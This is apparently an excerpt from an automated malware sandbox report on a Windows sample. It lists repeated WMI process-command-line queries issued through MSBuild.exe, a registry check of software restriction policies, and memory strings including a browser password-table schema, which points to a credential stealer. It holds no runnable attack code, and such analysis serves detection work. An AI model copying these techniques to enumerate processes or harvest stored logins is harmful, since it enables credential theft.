Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3812
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6816
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1628
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6368
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4204
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2364
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6772
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3752
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6332
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2452
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1568
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5444
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5012
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6296
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5268
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4564
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4132
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4924
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 8084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2392
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5856
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5832
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1952
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6836
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4536
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4104
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1084
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6684
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6252
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4572
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1936
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3228
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5808
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 632
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1056
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1476
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1892
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3584

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: u2xs.0.exe, u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: u2xs.0.exe, 00000008.00000003.2247113520.00000000042F3000.00000004.00000020.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000003.2280572773.0000000024828000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: u2xs.0.exe, 00000008.00000002.3041193321.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000002.3002159835.000000001E771000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
